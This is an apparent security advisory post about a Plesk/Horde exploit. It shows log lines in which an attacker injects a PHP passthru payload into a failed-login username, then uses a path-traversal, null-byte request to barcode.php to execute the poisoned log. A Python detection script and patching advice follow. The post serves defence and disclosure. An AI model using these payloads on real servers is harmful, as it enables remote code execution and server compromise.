Plesk Exploit: Readable Logfile Vulnerability
We recently noticed a high volume of vulnerability scans looking for instances of Plesk. We monitored this activity closely and discovered an exploit that takes advantage of a readable Horde logfile.
Here is the anatomy of the exploit:
A bogus request is made to the Horde login page with the malicious code in the username. This generates a log entry like the following in /var/log/psa-horde/psa-horde.log:
Feb 16 21:47:11 HORDE [error] [imp] FAILED LOGIN xx.xxx.x.xxx to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://google.com/ > /tmp/test.txt"); ?>@cip.test [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
A request is then made to the barcode.php page (which calls /usr/share/psa-horde/lib/Horde/Image.php) with a path-traversal type parameter pointing at the Horde log, so that the PHP code written into the log is executed:
xx.xxx.x.xxx - - [16/Feb/2012:21:47.16 -0600] "GET /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 170 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
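As an added illustration (not part of the original post), the following Python script detects both stages of this exploit in the two logs shown above: a failed Horde login whose username carries a PHP open tag, and a barcode.php request whose type parameter traverses to another file or ends in a null byte. The log lines it scans are constructed samples modelled on the entries quoted above, with documentation IP addresses; the function names are my own.

```python
import re

# Constructed sample log lines modelled on the entries in the post (not real captures).
HORDE_LOG = """\
Feb 16 21:47:11 HORDE [error] [imp] FAILED LOGIN 192.0.2.10 to localhost:143[imap/notls] as <?php passthru("id"); ?>@example.invalid [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
Feb 16 21:48:02 HORDE [error] [imp] FAILED LOGIN 192.0.2.11 to localhost:143[imap/notls] as alice@example.invalid [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
"""

ACCESS_LOG = """\
192.0.2.10 - - [16/Feb/2012:21:47:16 -0600] "GET /horde/util/barcode.php?type=../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 170 "-" "Mozilla/5.0"
192.0.2.12 - - [16/Feb/2012:21:50:00 -0600] "GET /horde/util/barcode.php?type=code128&text=12345 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Stage 1: a PHP open tag injected into the username of a failed IMAP login (log poisoning).
FAILED_LOGIN_RE = re.compile(r'FAILED LOGIN (?P<ip>\S+) .* as (?P<user>.*?) \[on line')
PHP_TAG_RE = re.compile(r'<\?(php|=)?', re.I)   # also flags bare "<?", which is fine for a hunt

# Stage 2: barcode.php "type" parameter carrying path traversal and/or a null byte.
BARCODE_RE = re.compile(r'^(?P<ip>\S+) .*"GET /horde/util/barcode\.php\?(?P<qs>[^" ]*)')
TRAVERSAL_RE = re.compile(r'(\.\./|%2e%2e|%00)', re.I)

def find_poisoned_logins(text):
    """Return (ip, username) for failed logins whose username contains a PHP open tag."""
    hits = []
    for line in text.splitlines():
        m = FAILED_LOGIN_RE.search(line)
        if m and PHP_TAG_RE.search(m.group('user')):
            hits.append((m.group('ip'), m.group('user')))
    return hits

def find_log_inclusion(text):
    """Return (ip, query) for barcode.php requests whose query traverses or null-terminates the path."""
    hits = []
    for line in text.splitlines():
        m = BARCODE_RE.search(line)
        if m and TRAVERSAL_RE.search(m.group('qs')):
            hits.append((m.group('ip'), m.group('qs')))
    return hits

def correlate(horde_log, access_log):
    """IPs seen in both stages: poisoning the log, then pulling it back in through barcode.php."""
    stage1 = {ip for ip, _ in find_poisoned_logins(horde_log)}
    stage2 = {ip for ip, _ in find_log_inclusion(access_log)}
    return sorted(stage1 & stage2)

if __name__ == "__main__":
    print("poisoned logins:", find_poisoned_logins(HORDE_LOG))
    print("log inclusion requests:", find_log_inclusion(ACCESS_LOG))
    print("IPs seen in both stages:", correlate(HORDE_LOG, ACCESS_LOG))
```

Either stage on its own is a strong signal; an IP that appears in both, in that order, is the full exploit sequence described above and warrants an incident check of the host.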
If the exploit is successful, the attacker then begins uploading malicious files to the server. These files then send out bogus UDP data over port 7. (source: Rackspace)
If you are using Plesk, make certain you are keeping your security patches up to date, and consider limiting access to certain system resources by IP.